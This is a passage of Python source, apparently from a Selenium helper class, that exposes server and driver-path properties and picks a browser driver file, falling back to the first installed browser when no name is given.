    @property
    def server(self):
        return self.__server

    @property
    def driverPath(self):
        return self.__DRIVER_PATH

    def selectBrowser(self, browserName):
        """Point driverPath at the Selenium driver for *browserName*."""
        self.__DRIVER_PATH = self.__PARENT_DIR + "/drivers/" + self.__getDriverName(
            browserName)

    def __getDriverName(self, browserName):
        """
        If selected value is None or is empty then get driver of
        the first installed browser.
        Else get driver of the selected browser.
        """
        if browserName is None or browserName == '':
            return next(iter(self.detectManager.installedBrowser.values()))
        else:
            return self.detectManager.installedBrowser[browserName]